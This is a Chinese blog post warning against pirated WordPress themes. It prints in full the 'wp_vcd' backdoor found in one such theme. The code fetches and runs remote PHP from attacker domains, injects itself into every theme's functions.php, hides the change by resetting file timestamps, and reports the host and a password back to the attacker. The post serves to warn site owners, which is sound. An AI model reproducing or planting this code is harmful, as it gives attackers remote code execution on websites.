本站5天前放出了一个emlog博客系统的盗版fee主题的网站数据

今天给大家分享一篇国外的WordPress盗版主题的文章

主题森林相信国内WordPress用户都很熟习,来自该网站的收费主题在国内盗版横行,一些无良者对主题进行所谓优化、汉化后直接出售,更有甚者居然还有冒充国内代理的。主题森林大部分主题并不像国内主题需要加密绑域名或远程验证防盗版(因为国外用盗版是犯罪行为根本不需要这个),并且在主题森林购买主题后可以退款,因为主题并没有任何防范措施,主题森林并不会收回你已获得的主题包,你可以完全正常使用。什么时候国内能有这让我们大中华人民不可理解的商业行为,相信国内会有更多优秀的 WordPress 主题出现。

这里转篇应该是来自孟加拉的一个WordPresse 用户,下载并使用盗版WordPresse主题的可怕经历。

盗版主题非常恐怖!

笔者为了测试兼容性,谷歌上搜索并在一个专门提供盗版主题下载的网站,下载了一款来自Theme Forest(主题森林)的高级收费主题,笔者虽然也感觉有些可疑但并没多想,直接在本地环境中安装并启用。

笔者本身有一定的技术,也怕主题中捆绑恶意代码,还特意查看一下主题函数模板functions.php中有无可疑代码,但并未发现可疑的东西,于是勇敢地激活启用主题,还有些小鸡冻!

当完成测试切换到WP默认主题后,Query Monitor 监视器插件发出警告。

于是笔者打开当前主题的functions.php发现如下代码:

  1. <?php
  2. if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '35c977caf96f9197995d4b4d3e14f253')) {
  3. $div_code_name = "wp_vcd";
  4. switch ($_REQUEST['action']) {
  5. case 'change_domain';
  6. if (isset($_REQUEST['newdomain'])) {
  7. if (!empty($_REQUEST['newdomain'])) {
  8. if ($file = @file_get_contents(__FILE__)) {
  9. if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
  10. $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
  11. @file_put_contents(__FILE__, $file);
  12. print "true";
  13. }
  14. }
  15. }
  16. }
  17. break;
  18. case 'change_code';
  19. if (isset($_REQUEST['newcode'])) {
  20. if (!empty($_REQUEST['newcode'])) {
  21. if ($file = @file_get_contents(__FILE__)) {
  22. if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
  23. $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']) , $file);
  24. @file_put_contents(__FILE__, $file);
  25. print "true";
  26. }
  27. }
  28. }
  29. }
  30. break;
  31. default:
  32. print "ERROR_WP_ACTION WP_V_CD WP_CD";
  33. }
  34. die("");
  35. }
  36. $div_code_name = "wp_vcd";
  37. $funcfile = __FILE__;
  38. if (!function_exists('theme_temp_setup')) {
  39. $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
  40. if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
  41. function file_get_contents_tcurl($url)
  42. {
  43. $ch = curl_init();
  44. curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
  45. curl_setopt($ch, CURLOPT_HEADER, 0);
  46. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  47. curl_setopt($ch, CURLOPT_URL, $url);
  48. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  49. $data = curl_exec($ch);
  50. curl_close($ch);
  51. return $data;
  52. }
  53. function theme_temp_setup($phpCode)
  54. {
  55. $tmpfname = tempnam(sys_get_temp_dir() , "theme_temp_setup");
  56. $handle = fopen($tmpfname, "w+");
  57. if (fwrite($handle, "<?php\n" . $phpCode)) {
  58. }
  59. else {
  60. $tmpfname = tempnam('./', "theme_temp_setup");
  61. $handle = fopen($tmpfname, "w+");
  62. fwrite($handle, "<?php\n" . $phpCode);
  63. }
  64. fclose($handle);
  65. include $tmpfname;
  66. unlink($tmpfname);
  67. return get_defined_vars();
  68. }
  69. $wp_auth_key = '358d76c863c31b2e1a46192808b08590';
  70. if (($tmpcontent = @file_get_contents("http://www.marors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.marors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
  71. if (stripos($tmpcontent, $wp_auth_key) !== false) {
  72. extract(theme_temp_setup($tmpcontent));
  73. @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
  74. if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
  75. @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
  76. if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
  77. @file_put_contents('wp-tmp.php', $tmpcontent);
  78. }
  79. }
  80. }
  81. }
  82. elseif ($tmpcontent = @file_get_contents("http://www.marors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
  83. if (stripos($tmpcontent, $wp_auth_key) !== false) {
  84. extract(theme_temp_setup($tmpcontent));
  85. @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
  86. if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
  87. @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
  88. if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
  89. @file_put_contents('wp-tmp.php', $tmpcontent);
  90. }
  91. }
  92. }
  93. }
  94. elseif ($tmpcontent = @file_get_contents("http://www.marors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
  95. if (stripos($tmpcontent, $wp_auth_key) !== false) {
  96. extract(theme_temp_setup($tmpcontent));
  97. @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
  98. if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
  99. @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
  100. if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
  101. @file_put_contents('wp-tmp.php', $tmpcontent);
  102. }
  103. }
  104. }
  105. }
  106. elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
  107. extract(theme_temp_setup($tmpcontent));
  108. }
  109. elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
  110. extract(theme_temp_setup($tmpcontent));
  111. }
  112. elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
  113. extract(theme_temp_setup($tmpcontent));
  114. }
  115. }
  116. }
  117. // $start_wp_theme_tmp
  118. // wp_tmp
  119. // $end_wp_theme_tmp
  120. ?>

通过这些代码,攻击者可以按自己的意愿在主题或服务器中推送任何代码。笔者庆幸自己没有在主机环境中安装这个主题,否则不知道会发生什么!但当前使用的这个并不是之前下载的那个盗版主题,经查看,所有WordPress本地环境中的主题的functions.php文件都被这个代码感染了,这太可怕了 !

删除这些代码后,Query Monitor 监视器插件仍然报告相同的错误,那怎么可能呢 ?再次打开文件,令人惊讶的是,代码又出现了!最终判定在向主题中注入代码的同时,它肯定还做了一些其他的事情。需要检查WordPress核心文件,经查创建了两个新文件并修改了一个核心文件包括文件夹。其中一个文件名称:wp-vcd.php,代码如下:

  1. <?php
  2. error_reporting(0);
  3. // gICAgICAgICAgICA
  4. ini_set('display_errors', 0);
  5. // 2V0KCRfUkVRVUVTVFsn
  6. $install_code = '<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '{$PASSWORD}'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				




				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;

								case 'change_code';
					if (isset($_REQUEST['newcode']))
						{
							
							if (!empty($_REQUEST['newcode']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
		   {
		   }
			else
			{
			$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
			fwrite($handle, "<?php\n" . $phpCode);
			}
			fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='358d76c863c31b2e1a46192808b08590';
        if (($tmpcontent = @file_get_contents("http://www.marors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.marors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.marors.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } 
		
		        elseif ($tmpcontent = @file_get_contents("http://www.marors.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
		elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>';
  7. $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
  8. $install_code = str_replace('{$PASSWORD}', $install_hash, base64_decode($install_code));
  9. $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
  10. $ping = true;
  11. $ping2 = false;
  12. if ($list = scandir($themes)) {
  13. foreach($list as $_) {
  14. if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
  15. $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
  16. if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
  17. if (strpos($content, 'WP_V_CD') === false) {
  18. $content = $install_code . $content;
  19. @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
  20. touch($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $time);
  21. }
  22. else {
  23. $ping = false;
  24. }
  25. }
  26. }
  27. else {
  28. $list2 = scandir($themes . DIRECTORY_SEPARATOR . $_);
  29. foreach($list2 as $_2) {
  30. if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
  31. $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
  32. if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php')) {
  33. if (strpos($content, 'WP_V_CD') === false) {
  34. $content = $install_code . $content;
  35. @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
  36. touch($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $time);
  37. $ping2 = true;
  38. }
  39. else {
  40. // $ping = false;
  41. }
  42. }
  43. }
  44. }
  45. }
  46. }
  47. if ($ping) {
  48. $content = @file_get_contents('http://www.marors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
  49. // @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.marors.com/admin.txt'));
  50. }
  51. if ($ping2) {
  52. $content = @file_get_contents('http://www.marors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
  53. // @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.marors.com/admin.txt'));
  54. // echo ABSPATH . 'wp-includes/class.wp.php';
  55. }
  56. }
  57. ?><?php
  58. error_reporting(0); ?>

最后想说的

1.盗版主题大部分都包含木马及后门程序,辛苦建好的网站谁也不想付诸东流,为了爱站,拒绝盗版。

2.盗版主题多为陈旧老版本,漏洞多,bug多,使用起来问题百出,免费的未必是最好的,为了效率,拒绝盗版。

3.盗版主题均无售后服务支持,出问题只能自己解决,正版用户均可享受售后服务,技术支持,并永久跟随官方升级更新,为了服务,拒绝盗版。

请不要在自己的网站上使用任何盗版主题和插件,不要相信这些插件或提供盗版主题的网站,否则将使你的宝贵数据丢失或者被黑客攻击。


请不要尝试将上面的代码复制到主题中,后果自负。

很多年前,我也喜欢尝试安装各种主题和插件,也遇到过类似的事情况,这里奉劝大家小心为上!

夜河资源网提供的所有内容仅供学习与交流。通过使用本站内容随之而来的风险以及法律责任与本站无关,所承担的法律责任由使用者承担。
一、如果您发现本站侵害了相关版权,请附上本站侵权链接和您的版权证明一并发送至邮箱:yehes#qq.com(#替换为@)我们将会在五天内处理并断开该文章下载地址。
二、本站所有资源来自互联网整理收集,全部内容采用撰写共用版权协议,要求署名、非商业用途和相同方式共享,如转载请也遵循撰写共用协议。
三、根据署名-非商业性使用-相同方式共享 (by-nc-sa) 许可协议规定,只要他人在以原作品为基础创作的新作品上适用同一类型的许可协议,并且在新作品发布的显著位置,注明原作者的姓名、来源及其采用的知识共享协议,与该作品在本网站的原发地址建立链接,他人就可基于非商业目的对原作品重新编排、修改、节选或者本人的作品为基础进行创作和发布。
四、基于原作品创作的所有新作品都要适用同一类型的许可协议,因此适用该项协议, 对任何以他人原作为基础创作的作品自然同样都不得商业性用途。
五、根据二〇〇二年一月一日《计算机软件保护条例》规定:为了学习和研究软件内含的设计思想和原理,通过安装、显示、传输或者存储软件等方式使用软件的,可不经软件著作权人许可,无需向其支付报酬!
六、鉴此,也望大家按此说明转载和分享资源!本站提供的所有信息、教程、软件版权归原公司所有,仅供日常使用,不得用于任何商业用途,下载试用后请24小时内删除,因下载本站资源造成的损失,全部由使用者本人承担!